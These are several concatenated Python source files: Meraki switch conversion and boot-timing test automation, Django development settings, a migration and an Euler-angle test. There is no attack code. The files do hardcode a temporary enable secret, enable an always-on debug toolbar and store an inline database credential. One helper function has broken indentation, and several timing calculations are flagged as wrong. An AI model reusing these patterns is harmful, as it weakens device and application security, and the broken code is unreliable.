                  continue_timer=False
                  ),
        Statement(pattern=r"Mac address is .*",
                  action='sendline()',
                  loop_continue=False,
                  continue_timer=False)
    ])
    cmd = 'service meraki register token {}'.format(token)
    try:
        device.execute(cmd, reply=dialog)
    except Exception as err:
        log.error("Failed to register the device correctly: {err}".format(err=err))
        raise Exception(err)
def configure_conversion_reversion(device, via_console, mode='conversion', reload_timeout=5000,
                                   username=None,
                                   password=None,
                                   reload_hostname='Switch',
                                   m_user="miles",
                                   m_pwd="<PASSWORD>",
                                   m_enable="<PASSWORD>",
                                   reload_creds=None,
                                   device_online_status_timeout=1000,
                                   retry=30,
                                   interval=10,
                                   api_key='0',
                                   serial='0',
                                   organization_id='0'):
    """
    This method verifies if the device is ready for conversion from CAT9K Classic mode
    to Meraki Mode.
    It verifies the device is ready by using 'show meraki' command.
    Once the device is ready, it execute 'service meraki start'
    which will reload the device and come up in Meraki mode.
    This will also calculates the time taken to connect to the dashboard.
    Args:
        device ("obj"): Device object
        via_console(`str`): Via to use to reach the device console.
        mode ("str"): Type of mode to be executed : 'conversion' or 'reversion'
        reload_timeout ("int"): How long to wait after the reload starts
        username ("str"): Username after conversion
        password ("str"): Password after conversion
        reload_hostname ("str"): reload_hostname after conversion will be 'Switch'
        m_user ("str"): Meraki Default Username
        m_pwd ("str"): Meraki Default Password
        m_enable ("str"): Meraki Default Enable Password
        reload_creds ("str"): Reload Credentials like device, hostname etc..
        device_online_status_timeout ("int"): Retry secs for the device to come online after conversion
        retry ("int"): Number of retries to be handled to check the device state
        interval ("int"): Sleep time between the retries
        api_key ('str"): API Key to connect to the dashboard
        serial ("str"): Serial / Token number of the device used to connect to dashboard
        organization_id ("str"): Org Id where the device is connected in dashboard
    Raises:
        Exception
    Returns:
        True if succeeded else False
    """
    if mode == 'conversion':
        mode_check = 'C9K-C'
        # Prompts seen while converting Classic -> Meraki.
        dialog = Dialog([
            Statement(
                pattern=r"Proceeding with conversion will permanently erase all data "
                        r"and the device can only be managed by Cisco Meraki dashboard. "
                        r"Continue\? \[Y\/N\]\[confirm\].*",
                action="sendline()",
                loop_continue=True,
                continue_timer=False,
            ),
            Statement(
                pattern=r"Continue \[Y\/N\]\[confirm\].*",
                action="sendline()",
                loop_continue=True,
                continue_timer=False,
            ),
            Statement(pattern=r"^.*RETURN to get started",
                      action='sendline()',
                      loop_continue=False,
                      continue_timer=False)
        ])
        log.info('Verify if the device is ready for conversion')
    else:
        mode_check = 'C9K-M'
        # Prompts of the initial-configuration wizard after reverting to IOS;
        # "Meraki12345" is a temporary secret, removed once reconnected.
        dialog = Dialog([
            Statement(
                pattern=r"proceeding with conversion is destructive to the current IOS configuration "
                        r"and will render the device to regular Cat9K "
                        r"Continue? \[confirm\].*",
                action="sendline()",
                loop_continue=True,
                continue_timer=False,
            ),
            Statement(
                pattern=r"^.*Enter host name \[Switch\]\:",
                action="sendline()",  # Temp password will be removed later
                loop_continue=True,
                continue_timer=False,
            ),
            Statement(
                pattern=r"^.*Enter enable secret\: ",
                action="sendline(Meraki12345)",  # Temp password will be removed later
                loop_continue=True,
                continue_timer=False,
            ),
            Statement(
                pattern=r"^.*Confirm enable secret\: ",
                action="sendline(Meraki12345)",  # Temp password will be removed later
                loop_continue=True,
                continue_timer=False,
            ),
            Statement(
                pattern=r"^.*Enter enable password\:",
                action="sendline(Meraki12345)",  # Temp password will be removed later
                loop_continue=True,
                continue_timer=False,
            ),
            Statement(
                pattern=r"^.*Enter virtual terminal password\:",
                action="sendline(Meraki12345)",  # Temp password will be removed later
                loop_continue=True,
                continue_timer=False,
            ),
            Statement(
                pattern=r"^.*Community string \[public\]\:",
                action="sendline()",  # Temp password will be removed later
                loop_continue=True,
                continue_timer=False,
            ),
            Statement(
                pattern=r"^.*management network from the above interface summary\:",
                action="sendline(GigabitEthernet0/0)",
                loop_continue=True,
                continue_timer=False,
            ),
            Statement(
                pattern=r"^.*IP address for this interface \[+\S+\]\:",
                action="sendline()",
                loop_continue=True,
                continue_timer=False,
            ),
            Statement(
                pattern=r"^.*Subnet mask for this interface \[+\S+\] \:",
                action="sendline()",
                loop_continue=True,
                continue_timer=False,
            ),
            Statement(
                pattern=r"^.*Enter your selection \[2\]\:",
                action="sendline()",
                loop_continue=True,
                continue_timer=False,
            ),
            Statement(
                pattern=r"^.*OK to enter CLI now\.\.\.",
                action="sendline()",
                loop_continue=True,
                continue_timer=False,
            ),
            Statement(pattern=r"^.*RETURN to get started",
                      action='sendline()',
                      loop_continue=False,
                      continue_timer=False)
        ])
        log.info('Verify if the device is ready for reversion')
    os = device.os
    hostname = device.name
    ip = str(device.connections[via_console]["ip"])
    port = str(device.connections[via_console]["port"])
    # Execute 'show meraki' and check the status of registration and the mode.
    # Switch#show meraki
    # Switch Serial Conversion
    # Num PID Number Meraki SN Mac Address Status Mode
    # 5 C9300-24T FJC2328U02M Q2ZZ-8FAF-954B 0018.0a00.50b7 Registered C9K-C
    cmd = 'show meraki'
    output = device.parse(cmd)
    if output is not None:
        for sw in output['meraki']['switch']:
            current_mode = output['meraki']['switch'][sw]['current_mode']
            conversion_status = output['meraki']['switch'][sw]['conversion_status']
            if current_mode != mode_check:
                log.error("Device is not ready, device is NOT in '{}' "
                          "mode".format(mode_check))
                return False
            if mode == 'conversion':
                if conversion_status != 'Registered':
                    log.error("Device is not ready, device is NOT Registered")
                    return False
                log.info('Device is ready for Conversion from C9K - '
                         'Classic Mode to C9K - Meraki Mode')
    # Start the Conversion or Reversion according to the
    # mode specified by the user.
    log.info('Recording the time before the Conversion/Reversion')
    T00 = device.parse('show clock')
    log.info('@@#@ T00 is {}'.format(T00))
    conv_start_time = time.time()
    if mode == 'conversion':
        log.info('Execute service meraki start command')
        cmd = 'service meraki start'
    else:
        log.info('Execute service meraki stop command')
        cmd = 'service meraki stop'
    try:
        device.execute(cmd, reply=dialog, timeout=reload_timeout)
        device.disconnect()
    except SubCommandFailure:
        # Disconnect and destroy the connection
        log.info(
            "Successfully executed {} command on device {}".format(
                device.name, cmd
            )
        )
        log.info(
            "Disconnecting and destroying handle to device {}".format(
                device.name
            )
        )
        device.disconnect()
        device.destroy()
    except Exception as e:
        raise Exception(
            "Error while reloading device '{}'".format(device.name)
        ) from e
    # Reconnect to device which will be in Meraki Mode after
    # conversion or in Classic mode after reversion
    log.info(
        "\n\nReconnecting to device '{}' after conversion/reversion "
        "and reload...".format(hostname)
    )
    # Device coming up in Meraki mode has the below default startup config applied
    # Uses the default static Username "miles" and Password parameters to
    # connect to the script after conversion.
    # FIX: the credential values were previously invalid placeholder tokens;
    # the m_pwd / m_enable parameters exist precisely to supply these.
    new_device = Connection(
        credentials=dict(default=dict(username=m_user, password=m_pwd),
                         enable=dict(password=m_enable)),
        os=os,
        hostname=reload_hostname,
        start=["telnet {ip} {port}".format(ip=ip, port=port)],
        prompt_recovery=True,
    )
    # Try to reconnect with iteration
    device_connected = 0
    for i in range(int(retry)):
        if device_connected:
            break
        con = new_device.connect()
        if 'Connected to' in con:
            log.info('Recording the time After the Conversion/Reversion')
            device_prompt_time = time.time()
            device_connected = 1
        else:
            time.sleep(interval)
            if i == int(retry) - 1:
                log.error('Retry connection failed')
                new_device.disconnect()  # Disconnect anyways before return
                return False
    log.info(
        "Successfully reconnected to device '{}' after 'Conversion/Reversion' "
        "and reload'".format(hostname)
    )
    new_device.configure('no enable password')  # Remove the temp password created
    new_device.configure('username {} privilege 15 password {}'
                         .format(username, password))  # Configure the original username and password
    new_device.execute('wr mem')  # Save the Config before disconnecting.
    new_device.disconnect()  # Disconnect the device
    if mode == 'conversion':
        log.info('Device from C9K-C to C9K-M Conversion happened Successfully')
        status_state = 'online'
    else:
        log.info('Device from C9K-M to C9K-C Reversion happened Successfully')
        status_state = 'offline'
    # Check the dashboard to find the status of the device
    if serial != '0' and api_key != '0' and organization_id != '0':
        try:
            import meraki  # import meraki api
        except Exception:
            log.error("Couldn't import Meraki will skip running this api")
            return True
        log.info('Connect to the Dashboard')
        dashboard = meraki.DashboardAPI(api_key)
        # Check the device status, retry until it comes online
        log.info('Check the device status, retry until it comes to the desired state')
        device_online = 0
        for i in range(int(device_online_status_timeout)):
            if device_online:
                break
            response = dashboard.organizations.getOrganizationDevicesStatuses \
                (organization_id, total_pages='all')
            for dev in response:
                if dev['serial'] == serial:
                    log.info('DEVICE Status: {}'.format(dev))
                    if dev['status'] == status_state:
                        device_status_time = time.time()
                        log.info('Device Status: {}'.format(dev))
                        log.info('---------------------------------')
                        log.info("--- %s seconds ---" % (time.time() - device_status_time))
                        log.info('---------------------------------')
                        device_online = 1
                    if i == (int(device_online_status_timeout) - 1):
                        log.error('Device is not Online within {} secs after '
                                  'Conversion: ABORT'.format(device_online_status_timeout))
                        return 0
                    else:
                        continue
        log.info('CALCULATE THE TIME TAKEN FOR CONVERSION OR REVERSION')
        log.info(banner('START TIME        : {}'.format(conv_start_time)))
        log.info(banner('END TIME          : {}'.format(device_prompt_time)))
        log.info(banner('DASHBOARD STATUS  : {}'.format(device_status_time)))
        conv_time = (int(device_prompt_time) - int(conv_start_time)) / 60
        dev_online = (int(device_status_time) - int(device_prompt_time)) / 60
        total_time = (int(device_status_time) - int(conv_start_time)) / 60
        log.info(banner('CONVERSION TIME         : {}'.format(conv_time)))
        log.info(banner('DEV ONLINE/OFFLINE TIME : {}'.format(dev_online)))
        log.info(banner('TOTAL TIME              : {}'.format(total_time)))
    return True
def _convert_seconds_to_minutes(seconds):
seconds = seconds % (24 * 3600)
hour = seconds // 3600
seconds %= 3600
minutes = seconds // 60
seconds %= 60
return "%d:%02d:%02d" % (hour, minutes, seconds)
def _show_clock_seconds(device):
    """Return the device's time-of-day from 'show clock', in whole seconds.

    Parses the HH:MM:SS(.frac) token out of the CLI output and converts it
    to seconds since midnight.

    Args:
        device: connected device object exposing .execute().

    Returns:
        int: seconds since midnight on the device clock.
    """
    output = device.execute('show clock')
    # Raw string avoids the invalid-escape SyntaxWarning on Python 3.12+.
    match_value = re.search(r'[0-9]+:[0-9]+:[0-9]+(\.[0-9]+)*', output)
    current_time = match_value.group(0)
    # Bug fix: previously this logged the `time` module object instead of
    # the parsed timestamp.
    log.info('@@#@ time is %s' % current_time)
    tmp = current_time.split(':')
    current_time_in_sec = float(tmp[2]) + (float(tmp[1]) * 60) + (float(tmp[0]) * 60 * 60)
    output = int(current_time_in_sec)
    return output
def c9k_m_reload_with_boot_measurement(device, api_key, organization_id, serial, intf_name, reload_type='api',
                                       routable_ip='192.168.1.1', timeout=1000, intfuptimeout=200):
    """
    This method is for the reboot and boot time measurements.
    This method has to 2 options for reboot one via Dashboard Meraki API and another via CLI
    With this it measures the below steps
    Step1: Time taken for the device to go offline after reload is given
    Step2: Time taken for the device to come online after reload
    Step3: Time taken for getting the boot prompt
    Args:
        device ("obj") : Device object
        api_key : Dashboard API Key for connecting to Dashboard
        organization_id : Organization Id where the device is claimed
        serial : Serial Number/ Token of the Device
        intf_name : Interface where the client is connected, used to verify the data after boot.
        reload_type : Type of Reload via 'api' or via 'cli'
        routable_ip : To Ping after the device is Up
        timeout : Reload Timeout used at both CLI and API
        intfuptimeout : Timeout Used for Interface to come up, used in CLI.
    Raises:
        Exception
    Returns:
        1 if succeeded else 0
    """
    # Optional dependency: all dashboard interaction needs the Meraki SDK.
    try:
        import meraki  # import meraki api
    except Exception:
        log.error('Couldnt import meraki will skip running this api')
        return 0
    log.info('Connect to the Dashboard')
    dashboard = meraki.DashboardAPI(api_key)
    # Pre-check: poll the dashboard until the device reports 'online' before
    # triggering the reload.
    # NOTE(review): these polling loops contain no sleep, so `timeout` is an
    # iteration count of back-to-back API calls, not seconds as the log text
    # implies — confirm the intended rate/API limits.
    log.info(banner('Check the status of the device'))
    device_online = 0
    for i in range(timeout):
        if device_online:
            break
        response = dashboard.organizations.getOrganizationDevicesStatuses \
            (organization_id, total_pages='all')
        for dev in response:
            if dev['serial'] == serial:
                log.info('DEVICE Status: {}'.format(dev))
                if dev['status'] == 'online':
                    device_online = 1
                if i == (timeout - 1):
                    log.error('Device is not Online within {} secs after '
                              'reload: ABORT'.format(timeout))
                    return 0
                else:
                    continue
    log.info('Device is Online, continue with Reload')
    log.info('Disconnect and Reconnect the device if there is a disconnect happens in previous runs.')
    device.disconnect()
    device.connect()
    log.info('Recording the time before the reload')
    T00 = device.parse('show clock')
    log.info('@@#@ T00 is {}'.format(T00))
    log.info(banner('Reloading the device'))
    device.execute('wr mem')
    if reload_type != 'api':  # CLI reload path (blocks until the device is back up)
        device.reload(timeout=timeout)
    else:
        # Reload the device using the API
        log.info('---------------------------------')
        log.info('Reload API Start time')
        api_start_time = time.time()
        # NOTE(review): this prints ~0.0 by construction — it subtracts the
        # timestamp captured on the previous line.
        log.info("--- %s seconds ---" % (time.time() - api_start_time))
        log.info('---------------------------------')
        response = dashboard.devices.rebootDevice(serial)
        log.info('Status of the Reload API: {}'.format(response))
        if response['success'] == True:
            log.info('Reboot request sent to device successfully')
        else:
            log.error('API did not send the Reboot Successfully: Abort')
    # Check the time taken for the device to go offline
    # NOTE(review): on the CLI path device.reload() returns only after the
    # box has rebooted, so 'offline' may never be observed below and this
    # loop can abort the run — confirm the CLI flow is still exercised.
    log.info('############################################################')
    log.info('Check the time taken for the device to go offline for reboot')
    log.info('############################################################')
    device_offline = 0
    for i in range(timeout):
        if device_offline:
            break
        response = dashboard.organizations.getOrganizationDevicesStatuses \
            (organization_id, total_pages='all')
        for dev in response:
            if dev['serial'] == serial:
                log.info(time.time())
                if dev['status'] == 'offline':
                    device_offline_time = time.time()
                    log.info('Device Status: {}'.format(dev))
                    log.info('---------------------------------')
                    # NOTE(review): always ~0.0 (subtracts itself).
                    log.info("--- %s seconds ---" % (time.time() - device_offline_time))
                    log.info('---------------------------------')
                    device_offline = 1
                if i == (timeout - 1):
                    log.error('Device has not gone Offline within {} secs after '
                              'reload sent from dashboard: ABORT'.format(timeout))
                    return 0
                else:
                    continue
    log.info('Wait for the device to come back online after reload')
    log.info(banner('Check the time taken for the device to come Online after reboot'))
    device_online = 0
    for i in range(timeout):
        if device_online:
            break
        response = dashboard.organizations.getOrganizationDevicesStatuses \
            (organization_id, total_pages='all')
        for dev in response:
            if dev['serial'] == serial:
                log.info('DEVICE Status: {}'.format(dev))
                if dev['status'] == 'online':
                    device_online_time = time.time()
                    log.info('Device Status: {}'.format(dev))
                    log.info('---------------------------------')
                    # NOTE(review): always ~0.0 (subtracts itself).
                    log.info("--- %s seconds ---" % (time.time() - device_online_time))
                    log.info('---------------------------------')
                    device_online = 1
                if i == (timeout - 1):
                    log.error('Device is not Online within {} secs after '
                              'reload: ABORT'.format(timeout))
                    return 0
                else:
                    continue
    log.info(banner('Check the time taken for the port to be connected after online'))
    port_online = 0
    for i in range(timeout):
        if port_online:
            break
        response = dashboard.switch.getDeviceSwitchPortsStatuses(serial)
        for dev in response:
            # NOTE(review): port '12' is hardcoded — presumably the port the
            # test client is attached to; confirm against the testbed.
            if dev['portId'] == '12':
                log.info('Port Status: {}'.format(dev))
                if dev['status'] == 'Connected':
                    port_connected_time = time.time()
                    log.info('Port Connected Time: {}'.format(dev))
                    log.info('---------------------------------')
                    # NOTE(review): always ~0.0 (subtracts itself).
                    log.info("--- %s seconds ---" % (time.time() - port_connected_time))
                    log.info('---------------------------------')
                    port_online = 1
                if i == (timeout - 1):
                    log.error('Port is not Online within {} secs after '
                              'reload: ABORT'.format(timeout))
                    return 0
                else:
                    continue
    log.info(banner('Time to get the prompt after reboot'))
    prompt_time = time.time()
    try:
        device.disconnect()
        device.connect()
    except Exception:
        log.error('Not able to reconnect after reload')
        return 0
    T01 = device.parse('show clock')
    log.info('@@#@ T01 : Time to get prompt after reboot is {}'.format(T01))
    device.execute("terminal length 0")
    device.execute("terminal width 0")
    log.info('IOS bootup time')
    # T0: boot duration as reported by IOS itself in the syslog.
    output = device.execute("show logg | in reboot")
    boot_time = re.search('.*:\s+Time taken to reboot after reload =\s+(\d+)\s+seconds$', output)
    boot_time_seconds = boot_time.group(1)
    log.info('@@#@ boot_time_seconds is {}'.format(boot_time_seconds))
    T0_sec = int(boot_time.group(1))
    log.info('@@#@ T0_sec is {}'.format(T0_sec))
    T0 = int(T0_sec / 60)
    log.info('@@#@ Initial boot time (power up to switch prompt) T0 is {}'.format(T0))
    log.info('---------------------------------')
    log.info("--- %s minutes ---" % T0)
    log.info('---------------------------------')
    log.info('Recording the time after the reload')
    T10_sec = _show_clock_seconds(device)
    log.info('@@#@ T10_sec is {}'.format(T10_sec))
    T10 = _convert_seconds_to_minutes(T10_sec)
    log.info('@@#@ T10 is {}'.format(T10))
    log.info('Disable Logging Console')
    device.configure('no logging console')
    log.info('Checking interface status')
    # checking interface state in a loop of 1500 sec
    # NOTE(review): each retry sleeps 10s, so the effective wait is about
    # intfuptimeout * 10 seconds, not `intfuptimeout` seconds.
    timer = 0
    int_state = 0
    while int_state != 1 and timer <= intfuptimeout:
        output = device.execute("show ip interface brief {} | in down".format(intf_name))
        if not 'administratively' in output:
            log.info('@@#@ PASS: Interface %s is changed from admin down to down ' % intf_name)
            log.info('Time to bring-up interface')
            T11_sec = _show_clock_seconds(device)
            log.info('@@#@ T11_sec is {}'.format(T11_sec))
            T11 = _convert_seconds_to_minutes(T11_sec)
            log.info('@@#@ T11 is {}'.format(T11))
            break
        else:
            log.info('@@#@ Interface %s is not changed from admin down to down and retry' % intf_name)
            time.sleep(10)
            timer += 1
    # NOTE(review): if the loop above never breaks, T11/T11_sec stay unbound
    # and the later references to them raise NameError.
    output = device.execute("show ip interface brief {} | in down".format(intf_name))
    if not 'administratively' in output:
        log.info('@@#@ PASS: Interface %s is changed from admin down to down ' % intf_name)
    else:
        log.error("@@@@ FAIL: Interface %s is not changed from admin down to down after 1500sec" % intf_name)
    device.execute("show ip int br | i up")
    device.execute("show ip int br")
    log.info('Checking ping and Mtunnel status')
    # Drop into the Meraki app-hosting shell to verify connectivity from the
    # Meraki side (raw transmit/receive, not the normal CLI API).
    device.transmit('app-hosting connect appid meraki session\r')
    device.receive('/ #', timeout=2)
    device.transmit('cat MERAKI_BUILD \r')
    device.receive('/ #', timeout=2)
    output = device.receive_buffer()
    log.info('@@#@ MERAKI BUILD is: %s' % output)
    device.transmit('cat /IOS_XE_BUILD \r')
    device.receive('/ #', timeout=2)
    output = device.receive_buffer()
    log.info('@@#@ IOS_XE_BUILD is: %s' % output)
    # checking ping status in a loop of 900 sec
    timer = 0
    ping_status = 0
    while ping_status != 1 and timer <= 90:
        device.transmit('ping -c 1 %s\r' % routable_ip)
        # device.receive('/ #',timeout = 20)
        device.receive(r'^.*packets received.*')
        output = device.receive_buffer()
        time.sleep(10)
        log.info('@@#@ Ping output is {}'.format(output))
        # import pdb;pdb.set_trace()
        if '1 packets received' in output:
            log.info('@@#@ Ping to %s passed' % routable_ip)
            # Capture the IOS clock (via dohost) the moment ping succeeds;
            # it is read back from flash later as T12.
            device.transmit('dohost "show clock" > /storage/time\r')
            device.receive('/ #', timeout=2)
            device.transmit('more /storage/time\r')
            device.receive('/ #', timeout=2)
            T112 = device.receive_buffer()
            time.sleep(10)
            log.info('@@#@ Testing T112 is {}'.format(T112))
            break
        else:
            log.info('@@#@ Ping to %s failed and retry' % routable_ip)
            time.sleep(10)
            timer += 1
    device.transmit('ping -c 1 %s\r' % routable_ip)
    device.receive(r'^.*packets received.*')
    output = device.receive_buffer()
    time.sleep(10)
    log.info('@@#@ Ping output is {}'.format(output))
    if '1 packets received' in output:
        log.info('@@#@ Ping to %s passed' % routable_ip)
    else:
        log.error("@@@@ FAIL: Ping is failed after 15 minutes once the interface state is changed ")
    # Dump Meraki-side state files for debugging. `output` is overwritten on
    # each read; only the last buffer survives (results are not logged).
    device.transmit('cat /tmp/connection_state\r')
    device.receive('/ #', timeout=2)
    output = device.receive_buffer()
    device.transmit('cat /click/ios/dump_pending_config_reqs\r')
    device.receive('/ #', timeout=5)
    output = device.receive_buffer()
    device.transmit('cat /click/uplinkstate/dhcp_state\r')
    device.receive('/ #', timeout=5)
    device.transmit('head -3 /click/uplinkstate/dhcp_state\r')
    device.receive('/ #', timeout=5)
    output = device.receive_buffer()
    device.transmit('cat /click/mtun/server1/state/debug_dump\r')
    device.receive('/ #', timeout=5)
    output = device.receive_buffer()
    device.transmit('cat /click/mtun/server2/state/debug_dump\r')
    device.receive('/ #', timeout=5)
    output = device.receive_buffer()
    device.transmit('cat /click/mtun/server3/state/debug_dump\r')
    device.receive('/ #', timeout=5)
    output = device.receive_buffer()
    device.transmit('exit\r')
    device.receive('#', timeout=2)
    device.transmit('\r')
    # Parse the timestamp that was saved at ping-success time (becomes T12).
    output = device.execute('more flash:/meraki/storage/time')
    match_value = re.search('[0-9]+:[0-9]+:[0-9]+(\.[0-9]+)*', output)
    current_time = match_value.group(0)
    log.info('@@#@ time is %s' % current_time)
    # return current_time
    tmp = current_time.split(':')
    current_time_in_sec = float(tmp[2]) + (float(tmp[1]) * 60) + (float(tmp[0]) * 60 * 60)
    T12_sec = int(current_time_in_sec)
    # return output
    log.info('@@#@ T12_sec is {}'.format(T12_sec))
    T12 = _convert_seconds_to_minutes(T12_sec)
    log.info('@@#@ T12 is {}'.format(T12))
    log.info('Collecting DMI and NDB Logs')
    device.execute('show logging process dmiauthd internal start last boot to-file flash:dmiauthd')
    device.execute('show logging process ndbmand internal start last boot to-file flash:ndbmand')
    log.info('Printing the performance numbers')
    log.info(banner('@@#@ T00 is {}'.format(T00)))
    log.info(banner('@@#@ T0 is {}'.format(T0)))
    log.info(banner('@@#@ T10 is {}'.format(T10)))
    log.info(banner('@@#@ T11 is {}'.format(T11)))
    log.info(banner('@@#@ T12 is {}'.format(T12)))
    # Derived intervals are device-clock based (seconds since midnight);
    # NOTE(review): a run that crosses midnight makes these negative.
    T1_sec = T11_sec - T10_sec
    T2_sec = T12_sec - T11_sec
    T3_sec = T0_sec + T1_sec + T2_sec
    log.info('@@#@ Initial boot time (power up to switch prompt) T0 is {}'.format(T0))
    T1 = _convert_seconds_to_minutes(T1_sec)
    log.info('@@#@ Incremental time for Meraki app to configure all interfaces T1 is {}'.format(T1))
    T2 = _convert_seconds_to_minutes(T2_sec)
    log.info('@@#@ Incremental time for Ping Success and Mtunnel UP T2 is {}'.format(T2))
    T3 = _convert_seconds_to_minutes(T3_sec)
    log.info('@@#@ Total time T3 is {}'.format(T3))
    if reload_type == 'api':
        log.info(banner('Calculate the time taken at each step'))
        log.info('Reload API Start            : {}'.format(api_start_time))
        log.info('Device Offline              : {}'.format(device_offline_time))
        log.info('Device Online after reboot  : {}'.format(device_online_time))
        log.info('Device Port Connected Time  : {}'.format(port_connected_time))
        log.info('Device Prompt Time          : {}'.format(T0))
        reboot_req_time = (device_offline_time - api_start_time) / 60
        dev_online_time = (device_online_time - device_offline_time) / 60
        # NOTE(review): operands look inverted — port_connected_time is
        # captured after device_online_time, so this is typically negative;
        # likely meant (port_connected_time - device_online_time) / 60.
        port_up_time = (device_online_time - port_connected_time) / 60
        total_time_from_reboot_req = (port_connected_time - api_start_time) / 60
        log.info(banner('RESULTS'))
        log.info('REBOOT REQ TIME TAKEN      : {}'.format(reboot_req_time))
        log.info('DEVICE ONLINE AFTER REBOOT : {}'.format(dev_online_time))
        log.info('PORT CONNECTED TIME        : {}'.format(port_up_time))
        log.info('DEVICE PROMPT TIME         : {}'.format(T0))
        log.info('TOTAL TIME TAKEN           : {}'.format(total_time_from_reboot_req))
    log.info('Reload Performed Successfully')
    return 1
| StarcoderdataPython |
189841 | <filename>config.py
"""You would probably keep your configuration out of the git repo, but
this works for a simple script.
See the docs for information on Flask configuration.
"""
DATABASE_NAME = 'flask_mongo_example'
| StarcoderdataPython |
1740024 | from .base import *
import sys
import logging.config
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
# Must mention ALLOWED_HOSTS in production!
ALLOWED_HOSTS = ['127.0.0.1']
# Turn off debug while imported by Celery with a workaround
# See http://stackoverflow.com/a/4806384
if 'celery' in sys.argv[0]:
DEBUG = False
# Django Debug Toolbar
INSTALLED_APPS +=('debug_toolbar',)
MIDDLEWARE_CLASSES+=['debug_toolbar.middleware.DebugToolbarMiddleware']
#INSTALLED_APPS += ('debug_toolbar.apps.DebugToolbarConfig',)
# Show emails to console in DEBUG mode
#EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
EMAIL_HOST = env.str('EMAIL_HOST')
EMAIL_HOST_USER = env.str('EMAIL_HOST_USER')
EMAIL_HOST_PASSWORD = env.str('EMAIL_HOST_PASSWORD')
EMAIL_PORT = env.int('EMAIL_PORT')
EMAIL_USE_SSL = env.bool('EMAIL_USE_SSL')
EMAIL_USE_TLS = env.bool('EMAIL_USE_TLS')
DEFAULT_FROM_EMAIL = 'MiDSystem <NO_REPLY@localhost>'
#db settings
#fix this for production
DATABASES = {
    # Raises ImproperlyConfigured exception if DATABASE_URL not in
    # os.environ
    #'default': env.db()
    'default': {
        'ENGINE': 'django.db.backends.mysql', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
        'NAME': 'MiDSystem', # Or path to database file if using sqlite3.
        'USER': 'midsystem', # Not used with sqlite3.
        # NOTE(review): hardcoded DB credential checked into settings —
        # switch back to env.db()/environment variables before deploying.
        'PASSWORD': '***<PASSWORD>$$$', # Not used with sqlite3.
        'HOST': 'localhost', # Set to empty string for localhost. Not used with sqlite3.
        'PORT': '3306', # Set to empty string for default. Not used with sqlite3.
    }
}
# Log everything to the logs directory at the top
LOGFILE_ROOT = join(dirname(BASE_DIR), 'logs')
# Hosts the Debug Toolbar treats as "internal". Must be a tuple:
# ('127.0.0.1') without a trailing comma is just a string, not a 1-tuple.
INTERNAL_IPS = ('127.0.0.1',)
def show_toolbar(request):
    """Always show the Django Debug Toolbar (this is the dev settings module)."""
    return True
DEBUG_TOOLBAR_CONFIG = {
    "SHOW_TOOLBAR_CALLBACK" : show_toolbar,
}
#def show_toolbar(request):
# return True
#SHOW_TOOLBAR_CALLBACK = show_toolbar
# Reset logging
# http://www.caktusgroup.com/blog/2015/01/27/
# Django-Logging-Configuration-logging_config-default-settings-logger/
'''
LOGGING_CONFIG = None
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'verbose': {
'format': (
'[%(asctime)s] %(levelname)s '
'[%(pathname)s:%(lineno)s] %(message)s'
),
'datefmt': "%d/%b/%Y %H:%M:%S"
},
'simple': {
'format': '%(levelname)s %(message)s'
},
},
'handlers': {
'django_log_file': {
'level': 'DEBUG',
'class': 'logging.FileHandler',
'filename': join(LOGFILE_ROOT, 'django.log'),
'formatter': 'verbose'
},
'proj_log_file': {
'level': 'DEBUG',
'class': 'logging.FileHandler',
'filename': join(LOGFILE_ROOT, 'project.log'),
'formatter': 'verbose'
},
'console': {
'level': 'DEBUG',
'class': 'logging.StreamHandler',
'formatter': 'simple'
}
},
'loggers': {
'django': {
'handlers': ['django_log_file', ],
'propagate': True,
'level': 'DEBUG',
},
# 'project': {
# 'handlers': ['proj_log_file', 'console', ],
# 'level': 'DEBUG',
# },
}
}
for app in LOCAL_APPS:
LOGGING['loggers'][app] = {
'handlers': ['proj_log_file', 'console', ],
'level': 'DEBUG',
}
logging.config.dictConfig(LOGGING)
'''
| StarcoderdataPython |
3270369 | <filename>readthedocs/builds/migrations/0029_add_time_fields.py
# Generated by Django 2.2.16 on 2020-11-18 16:26
from django.db import migrations
import django_extensions.db.fields
class Migration(migrations.Migration):
    """builds 0029: add created/modified timestamps to Version.

    Both columns are managed by django-extensions (set on insert / on every
    save) and are nullable, so existing rows need no backfill.
    """
    dependencies = [
        ('builds', '0028_add_delete_version_action'),
    ]
    operations = [
        migrations.AddField(
            model_name='version',
            name='created',
            field=django_extensions.db.fields.CreationDateTimeField(auto_now_add=True, null=True, verbose_name='created'),
        ),
        migrations.AddField(
            model_name='version',
            name='modified',
            field=django_extensions.db.fields.ModificationDateTimeField(auto_now=True, null=True, verbose_name='modified'),
        ),
    ]
| StarcoderdataPython |
118611 | <filename>tests/test_eul.py
import numpy as np
import pytest
from rotations import EulerAngles, AngleType, RotationMatrix
def test_constructors():
    """All three construction paths produce consistent angles."""
    from_list = EulerAngles([0, 0, np.pi])
    from_args = EulerAngles.from_angles(0, 0, np.pi)
    from_rot = EulerAngles.from_rotmat(RotationMatrix.default())
    assert from_list.roll == from_args.roll
    assert from_list.pitch == from_args.pitch
    assert from_list.yaw == pytest.approx(from_args.yaw)
    assert from_rot.roll == from_rot.pitch == from_rot.yaw == pytest.approx(0.0)
def test_properties():
    """Roll/pitch/yaw setters update each angle independently."""
    first = EulerAngles([0, 0, np.pi / 2])
    second = first.copy()
    second.roll = 0.2
    second.pitch = -0.2
    first.yaw = 1.0
    second.yaw = 1.0
    assert first.roll < second.roll
    assert first.pitch > second.pitch
    assert first.yaw == second.yaw
def test_wrong_constructors():
    """A four-element vector must be rejected by the constructor."""
    with pytest.raises(Exception):
        EulerAngles([1, 2, 3, 4])
def test_angle_types():
    """Radians and degrees inputs/outputs are interchangeable."""
    rad = EulerAngles([0, 0, np.pi / 2])
    deg = EulerAngles.from_angles(0, 0, 90, AngleType.DEGREES)
    assert rad.yaw == pytest.approx(deg.yaw)
    assert rad.as_vector(AngleType.DEGREES)[2] == pytest.approx(90.0)
    assert (rad.as_vector() == np.array([0, 0, np.pi / 2])).all()
def test_rotation_matrix():
    """R_bi() matches a precomputed reference matrix for angles (1, 2, 3)."""
    angles = EulerAngles([1, 2, 3])
    expected = np.array([[0.4119822, -0.8337377, -0.3676305],
                         [-0.0587266, -0.4269176, 0.9023816],
                         [-0.9092974, -0.3501755, -0.2248451]])
